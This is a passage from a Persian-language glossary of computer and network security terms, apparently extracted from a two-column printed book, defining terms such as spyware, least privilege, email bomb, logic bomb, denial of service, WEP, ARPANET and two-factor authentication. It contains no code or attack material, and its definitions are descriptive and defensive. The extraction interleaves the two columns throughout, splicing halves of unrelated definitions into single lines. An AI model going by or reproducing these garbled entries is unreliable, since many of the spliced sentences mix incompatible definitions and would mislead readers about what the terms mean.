ﺗﻬﺎﺟﻤﻲ ﻛﻪ ﻃﻲ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻳـﻚ ﻳﻚ ﻧﻘﺺ ﻳﺎ ﺿﻌﻒ ﺩﺭ ﻃﺮﺍﺣﻲ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ،ﻳـﺎ ﻋﻤﻠﻜـﺮﺩ ﻳـﻚ
ﺧﻂ ﺳﻴﺴﺘﻢ ﺍﺭﺗﺒﺎﻃﻲ ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﺍﺻﻄﻼﺡ ﺳﻴﺴﺘﻢ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻮﺭﺩ ﺑﻬـﺮﻩﺑـﺮﺩﺍﺭﻱ ﻗـﺮﺍﺭ
ﺩﺭ ﺍﺻﻞ ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻜﺎﻧﻴﻜﻲ ﺑﻪ ﻳﻚ ﺭﺳﺎﻧﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺑﻜـﺎﺭ ﺑﮕﻴﺮﺩ ﻭ ﻣﻨﺠﺮ ﺑﻪ ﻧﻘﺾ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻢ ﺷﻮﺩ.
ﻣﻲﺭﻓﺘﻪ ،ﺍﻣﺎ ﻫﻢﺍﻛﻨﻮﻥ ﺑﻪ ﺧﻮﺍﻧﺪﻥ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻫﺮ ﻭﺍﺳﻄﻲ ﻛـﻪ ٣٦٤
ﺍﺑﺰﺍﺭ ﺟﺎﺳﻮﺳﻲ
ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﺩ )ﺣﺘﻲ ﺩﺳـﺘﻴﺎﺑﻲ
ﺑﺮﻧﺎﻣﻪ ﺍﻱ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺮﺍﻱ ﺩﺯﺩﻳﺪﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻭ
ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻄﻮﺭ ﻣﺴﺘﻘﻴﻢ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﮔـﺮﻩ ،ﺩﺭﻭﺍﺯﻩ ٣٧٠ﻭ ﻳـﺎ ﺳـﻮﺋﻴﭻ(٣٧١
ﺳﺎﻳﺮ ﺩﺍﺩﻩﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ.
ﺍﻃﻼﻕ ﻣﻲﺷﻮﺩ.
٣٦٥
٣٧٢ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ )(ISP
ﺍﻣﺘﻴﺎﺯ ﺣﺪﺍﻗﻞ
ﺷﺮﻛﺘﻲ ﻛﻪ ﻳﻚ ﻓـﺮﺩ ﻳـﺎ ﺳـﺎﺯﻣﺎﻥ ﺍﺯ ﻃﺮﻳـﻖ ﺁﻥ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ
ﻃﺮﺍﺣﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﺣﺪﺍﻗﻞ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ
ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ .ﻧﻮﻋﹰﺎ ISPﻫﺎ ﻋـﻼﻭﻩ ﺑـﺮ ﻓـﺮﺍﻫﻢ ﻛـﺮﺩﻥ
ﻛﺎﺭ ﻛﻨﺪ .ﺍﻳﻦ ﻃﺮﺍﺣﻲ ،ﺳﻄﺢ ﺍﻋﺘﺒﺎﺭ ﺗﺼﺪﻳﻖﺷـﺪﻩ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ،ﺧﺪﻣﺎﺕ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻣﻴﺰﺑﺎﻧﻲ ﻭﺏ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ ،ﻭ ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﻋﻤﻠﻜﺮﺩ
ﺭﺍ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﻫﺪ .ﺑﺮﺧﻲ ISPﻫﺎ ﻫﻤﭽﻨـﻴﻦ ﺧـﺪﻣﺎﺕ ﺫﺧﻴـﺮﺓ
ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﺎ ﺣﻘﻮﻕ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻻ ﻣﻨﺠﺮ ﺑﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ
ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺧﺎﺭﺝ ﺍﺯ ﺍﺩﺍﺭﻩ ﻭ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ.
ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺭﺧﻨﺔ ﺍﻣﻨﻴﺘﻲ ﺷﻮﺩ ﺭﺍ ﭘﺎﻳﻴﻦ ﻣﻲﺁﻭﺭﺩ.
٣٦٦
٣٧٣ ﺍﺭﺯﻳﺎﺑﻲ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺣﺎﻟﺖ
ﺍﻣﻀﺎﻱ ﻣﻌﺘﺒﺮ
ﺭﻭﺷــﻲ ﺑــﺎ ﺁﻣﻴــﺰﻩﺍﻱ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬــﺎﻱ proxyﻭ ﻏﺮﺑــﺎﻝﺳــﺎﺯﻱ
ﻳﻚ ﺍﻣﻀﺎ ،ﺧﺼﻮﺻﹰﺎ ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ،ﻛﻪ ﭼﻮﻥ ﻣﻲﺗﻮﺍﻧـﺪ
ﻣﺘﻨﺎﻭﺏ ،ﺑﺴﺘﻪ ﺑﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﻭ ﻳﺎ ﻧﻴﺎﺯ ﺑﻪ ﺳﺮﻋﺖ ﺩﺭ ﻛﺎﺭ.
ﻣﻮﺭﺩ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺄﻳﻴﺪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ،ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺁﻥ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ.
ﺑﺨﺶ ﺷﺸﻢ
٣٧٨
ﺑﻤﺐ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻃﻼﻋــﺎﺕ ﺩﺭ ﻣــﻮﺭﺩ ﺗﻌــﺎﺭﻳﻒ ﻭ ﺍﻟﺰﺍﻣــﺎﺕ ﻋﻤﻠﻜــﺮﺩ ﻭ ﻛــﺎﺭﺍﻳﻲ
ﺱ
ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺍﮔﺮ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ ،ﭘﻴﺎﻣﻬـﺎﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺑـﻪ ﺁﺩﺭ ﹺ 802.11ﺩﺭ ﺳﻨﺪ ﺯﻳﺮ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ:
ﺩﺍﺩﻩﺷﺪﻩ ﻣﻲﻓﺮﺳﺘﺪ ﺗﺎ ﺩﻳﺴﻚ ﺭﺍ ﭘﺮ ﻛﻨﺪ ﻭ ﻳـﺎ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
http://grouper.ieee.org/groups/802/11/Docu
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﻭﺏ ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ. ments/DocumentArchives/1992-
docs/1192091.DOC
٣٧٩
ﭘﺮﺩﺍﺯﺵ ﺛﺒﺖ
٣٧٤
ﺭﻭﺍﻝ ﺧﻼﺻﻪﺳﺎﺯﻱ ﻭﻗﺎﻳﻊ ﺛﺒﺖﺷﺪﻩ ،ﺑﺮﺭﺳﻲ ﺛﺒﺘﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ، ﺍﻣﻨﻴﺖ ﺑﺮ ﭘﺎﻳﺔ ﻣﺤﻴﻂ
ﻭ ﻳﺎ ﺟﺴﺘﺠﻮ ﺑﺪﻧﺒﺎﻝ ﻭﻗﺎﻳﻊ ﻛﻠﻴﺪﻱ. ﻓﻨﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺒﻜﻪ ﺑﺎ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﻤـﺎﻡ ﻧﻘـﺎﻁ
ﻭﺭﻭﺩﻱ ﻭ ﺧﺮﻭﺟﻲ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻥ.
٣٨٠
ﭘﺮﻭﺗﻜﻞ
ﻫﺮﻳﻚ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﻣﻮﺭﺩ ﺗﻮﺍﻓﻖ ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ. ﺍﻳﻨﺘﺮﻧﺖ
ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﻭ ﺩﺭ ﺍﺭﺗﺒـﺎﻁ ﻣﺘﻘﺎﺑـﻞ ﻛـﻪ
ﭘﺮﻭﺗﻜﻞ ﻣﻌﺎﺩﻝ ﺑﻲﺳﻴﻢ )(WEP ﺗﻮﺳﻂ ﻧﻬﺎﺩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺗﺠﺎﺭﻱ ﻭ ﺩﻭﻟﺘﻲ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﺍﺳـﺖ.
ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ WLANﻃﺮﺍﺣﻲ ﺭﻳــﺸﻪﻫــﺎﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﺩﺭ ﺍﻭﺍﻳــﻞ ﺳــﺎﻝ - ۱۹۶۹ﻫﻨﮕﺎﻣﻴﻜــﻪ
ﺷﺪﻩ ﺑﻮﺩ ﺗﺎ ﺷﺪﻩ ﺑﻮﺩ ﺗﺎ ﺧﺼﻮﺻﻴﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ ﺭﺍ ARPANETﺷﻜﻞ ﮔﺮﻓﺖ -ﺑﻮﺟﻮﺩ ﺁﻣـﺪ ARPA .ﻋﻼﻣـﺖ
ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ )ﻭﻳﮋﮔﻴﻬﺎﻳﻲ ﭼﻮﻥ ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ،ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﺧﺘﺼﺎﺭﻱ ﺳﺎﺯﻣﺎﻥ ﭘﺮﻭﮊﻩﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﭘﻴﺸﺮﻓﺘﻪ ٣٧٥ﺍﺳـﺖ ﻛـﻪ
ﺩﺍﺩﻩﻫﺎ( ،ﻭﻟﻲ ﺑﻪ ﺩﻟﻴﻞ ﺁﺷﻜﺎﺭ ﺷﺪﻥ ﻳـﻚ ﻧﻘـﺺ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺁﻥ، ﺑﺨﺸﻲ ﺍﺯ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﺤﺴﻮﺏ ﻣﻲﺷﺪ .ﻳﻜﻲ ﺍﺯ
ﻻ ﺑﺎ ﺗﺪﺍﺑﻴﺮ ﻭﻳﮋﺓ ﺩﻳﮕﺮﻱ ﻫﻤﺮﺍﻩ ﻣﻲﺷﻮﺩ. ﻛﺎﺭﺑﺮﺩ ﺁﻥ ﻣﻌﻤﻮ ﹰ ﺍﻫﺪﺍﻑ ARPANETﺗﺤﻘﻴﻖ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﻮﺯﻳﻊﺷﺪﺓ
ﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩ ﺩﺭ ﺍﻫﺪﺍﻑ ﻧﻈﺎﻣﻲ ﺑﻮﺩ .ﺍﻭﻟـﻴﻦ ﭘﻴﻜﺮﺑﻨـﺪ ﹺ
٣٨١
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺁﻥ ﻣﺘﺸﻜﻞ ﺍﺯ ۴ﺭﺍﻳﺎﻧﻪ ﺑﻮﺩ ﻭ ﺑﻪ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺑﻪ ﻃﺮﺍﺣﻲ ﺩﺭ ﺁﻣﺪﻩ
ﻣﻌﺎﺩﻝ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﺎﻣﻪﻫﺎﻱ ﭘﺴﺘﻲ؛ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺗﻮﺳـﻂ ﻫـﺮ ﺑﻮﺩ ﻛﻪ ﻧﺸﺎﻥ ﺩﻫﺪ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﭘﺮﺍﻛﻨـﺪﻩ ﺩﺭ
ﺷﺨﺼﻲ ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺍﺳـﺖ ﻓﺮﺳـﺘﺎﺩﻩ ﻭ ﻳـﺎ ﺩﺭﻳﺎﻓـﺖ ﻳﻚ ﻣﻨﻄﻘﺔ ﻭﺳﻴﻊ ،ﺷﺒﻜﻪ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ .ﮔﺴﺘﺮﺵ ﺷﺒﻜﻪﻫﺎﻱ ﺑـﺎﺯ
ﺷﻮﺩ .ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺍﻳﻨﺘﺮﻧﺖ ،ﺗﻤﺎﻡ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺘـﺸﻜﻞ ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ۱۹۸۰ﻧﻴﺎﺯﻣﻨﺪ ﻣﺪﻝ ﺟﺪﻳـﺪﻱ ﺍﺯ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺑـﻮﺩ.
ﺍﺯ ﻣﺘﻮﻥ ﭼﺎﭘﻲ (ASCII) ٣٨٢ﻫﺴﺘﻨﺪ. ﺍﺩﻏﺎﻡ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﻣﺨﺘﻠﻂ ،ﺑـﻪ ﻳـﻚ
٣٨٣
ﻣﺒﺪﻝ ﺑﻬﺘﺮ ﻣﻴﺎﻥ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﻏﻴـﺮ ﺍﻧﺤـﺼﺎﺭﻱ
ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ
ﺑﺮﺍﻱ ﺳﺎﺧﺖ ﺷﺒﻜﻪﻫﺎ ﻧﻴﺎﺯ ﺩﺍﺷﺖ .ﭘﺮﻭﺗﻜـﻞ ) TCP/IPﭘﺮﻭﺗﻜـﻞ
ﻇﺮﻓﻴﺖ ﻳﻚ ﺍﺗﺼﺎﻝ ﺩﺍﺩﻩﺍﻱ ﺷﺒﻜﻪ ﻛـﻪ ﻏﺎﻟﺒـﹰﺎ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻻﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ/ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧـﺖ( ٣٧٦ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺩﺭ ﺁﻧﺰﻣﺎﻥ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎ ﻭﺍﺣﺪ ﻫﺰﺍﺭ ﺑﻴﺖ ﺩﺭ ﺛﺎﻧﻴـﻪ ) ٣٨٤(kbpsﺍﻧـﺪﺍﺯﻩﮔﻴـﺮﻱ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩﺣﻞ ﺭﺍ ﺍﺭﺍﺋﻪ ﺩﺍﺩ.
ﻣﻲﺷﻮﺩ.
٣٧٧
٣٨٥
ﺑﻤﺐ ﻣﻨﻄﻘﻲ
ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ
ﺑﺮﻧﺎﻣﻪ ﺍﻱ ﻛﻪ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﻭﺍﺭﺩ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﻲﺷـﻮﺩ .ﺑﻤـﺐ
ﻓﺮﺁﻳﻨﺪ ﺍﺣﺮﺍﺯ ﻣﻴﺰﺍﻥ ﺣﻖ ﺩﺳﺘﺮﺳﻲ ﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺸﺮﻭﻉ ﻳﻚ ﻛﺎﺭﺑﺮ، ﻣﻨﻄﻘﻲ ﺗﺎ ﭘﻴﺶ ﺍﺯ ﺭﻭﻳﺎﺭﻭﻳﻲ ﺑﺎ ﻳﻚ ﺷﺮﺍﻳﻂ ﺍﺯﭘﻴﺶ ﺗﻌﺮﻳﻒﺷﺪﻩ،
ﭘﺮﺩﺍﺯﻩ ﻳﺎ ﺑﺮﻧﺎﻣﻪ ،ﻃﺒﻖ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺷـﺮﻛﺖ ﻧﻬﻔﺘﻪ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﺪ ،ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﻳﻚ ﻋﻤﻞ ﻏﻴﺮﻣﺠﺎﺯ ﺭﺍ ﺍﻧﺠـﺎﻡ
ﻻ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﭘﺲ ﺍﺯ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﺎﺭﺑﺮ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻣﻌﻤﻮ ﹰ ﻣﻲﺩﻫﺪ.
٣٩٢
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭ ﻋﺎﻣﻠﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ،ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﺎﺭﺑﺮ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻔـﻲ
ﻣﺒﻨﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭ ﻋﺎﻣﻠﻲ ﺁﻥ ﭼﻴـﺰﻱ ﺍﺳـﺖ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺍﻋﻄﺎ ﻛﺮﺩ.
ﻣﻲﺩﺍﻧﺪ )ﻋﺎﻣﻞ ﺍﻭﻝ( ﺑﻌﻼﻭﺓ ﭼﻴﺰﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﺁﻧـﺮﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ
٣٨٦
)ﻋﺎﻣﻞ ﺩﻭﻡ( .ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ ،ﻛـﺎﺭﺑﺮ ﺑﺎﻳـﺪ ﻫـﺮ ﺩﻭ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﺩﺳﺘﺮﺳﻲ
ﻋﺎﻣﻞ ﺭﺍ ﺑﺮ ﺁﻭﺭﺩ ،ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻫﻨﮕﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ ﻣﺠﻮﺯ ﻓﺮﺁﻳﻨﺪﻱ ﻛﻪ ﻃﻲ ﺁﻥ ﻛﺎﺭﺑﺮﺍﻥ ،ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺍﻳـﺴﺘﮕﺎﻩﻫـﺎﻱ
ﺧﻮﺩﭘﺮﺩﺍﺯ ﺑﺎﻳﺪ ﻛـﺎﺭﺕ ﻣﺨـﺼﻮﺹ ﺁﻧـﺮﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻭ ﺷـﻤﺎﺭﺓ ﻛﺎﺭﻱ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻭ ﺗﺄﻳﻴﺪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ.
ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ ) (PINﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻭﺍﺭﺩ ﻛﻨﺪ .ﻛـﺎﺭﺑﺮﺍﻥ ﺑـﺮﺍﻱ ٣٨٧
ﺗﺎﺑﻠﻮﻱ ﺍﻋﻼﻧﺎﺕ
ﺍﻳﻨﻜﻪ ﺩﺭ ﻃﻮﻝ ﻓﺮﺁﻳﻨﺪ ﭘﺮﺳﺶ ﻭ ﭘﺎﺳﺦ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺷـﻮﻧﺪ،
ﻳﻚ ﻣﺤﻴﻂ ﺑﺮﺍﻱ ﺗﻌﺎﻣـﻞ ﺩﺍﻧـﺶ ﻛـﻪ ﺩﺭ ﺁﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧـﺖ
ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﻗﺎﺩﺭﻧﺪ ﭘﻴﺎﻡ ﺑﻨﻮﻳـﺴﻨﺪ ،ﭘﻴﺎﻣﻬـﺎﻱ ﺳـﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﺨﻮﺍﻧﻨـﺪ ،ﻭ
٣٩٣
ﺗﺼﻮﻳﺮ ﺁﻧﻲ ﺗﺒﺎﺩﻝ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﻓﺎﻳﻞ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ.
ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻣﻘﺎﺩﻳﺮ ﻣﺨﺘﻠﻒ ﺣﺎﻓﻈﺔ ﻳﻚ ﺭﺍﻳﺎﻧﻪ )ﺣﺎﻓﻈـﺔ ﺍﺻـﻠﻲ، ٣٨٨
ﺗﺤﻠﻴﻞ ﻣﺨﺎﻃﺮﻩ
ﺛﺒﺎﺗﻬﺎﻱ ﺧﺎﺹ ،ﻭ (...ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﻣﺸﺨﺺ .ﺗﺼﻮﻳﺮ ﺁﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ
ﺍﺭﺯﻳﺎﺑﻲ ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ،ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﻮﺟﻮﺩ ،ﻭ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ
ﻻ ﻗﺒـﻞ ﺍﺯ ﺗﻜﻤﻴـﻞ ﺣﻤﻠـﻪ ﺗﻮﺳـﻂ ﺑﺎ ﺿﺒﻂ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻣﻌﻤـﻮ ﹰ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ .ﺗﺤﻠﻴـﻞ ﻣﺨـﺎﻃﺮﻩ ﻳـﻚ
ﻣﻬﺎﺟﻢ ﭘﺎﻙ ﻣﻲﺷﻮﺩ ،ﺟﻬﺖ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻜﺎﺭ ﺭﻭﺩ.
ﺗﺨﻤــﻴﻦ ﺍﺯ ﺍﺭﺯﺵ ﻣــﺎﻟﻲ ﺁﺳــﻴﺒﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺑﺪﺳــﺖ ﻣــﻲﺩﻫــﺪ ﻭ
ﺗﻬﺎﺟﻢ ٣٩٤ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ.
ﺗﻼﺵ ﺑﺮﺍﻱ ﺧﺪﺷﻪﺩﺍﺭ ﻛﺮﺩﻥ ﺍﻣﻨﻴﺖ ﺳﻴـﺴﺘﻢ ؛ ﺗـﻼﺵ ﻋﻤـﺪﻱ ٣٨٩
ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ
ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﺧﺪﻣﺎﺕ ﺣﻔﺎﻇﺘﻲ ﻭ ﻧﻘﺾ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ
ﻧﻮﻋﻲ ﺣﻤﻠﻪ ﻛﻪ ﺯﻣﺎﻧﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘـﺼﻞ ﺑـﻪ
ﺳﻴﺴﺘﻢ.
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﭘﻴﺎﻣﻬﺎﻱ ﺑﻲﻣﺼﺮﻑ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﻤﺒﺎﺭﺍﻥ ﻣﻲﺷـﻮﻧﺪ،
٣٩٥
ﺗﻬﺪﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺗﻤﺎﻡ ﻭﻗﺖ ﻭ ﺗﻮﺍﻥ ﺧﻮﺩ ﺭﺍ ﺻـﺮﻑ ﭘﺎﺳـﺦ ﺑـﻪ ﺍﻳـﻦ
ﻫﺮ ﭼﻴﺰﻱ ﻛﻪ ﺗﻮﺍﻧﺎﻳﻲ ﺧﺪﺷﻪﺩﺍﺭ ﻛـﺮﺩﻥ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﻭ ﺻـﺤﺖ، ﭘﻴﺎﻣﻬﺎ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺍﻗﻌﻲ ﻣﺠـﺎﻝ
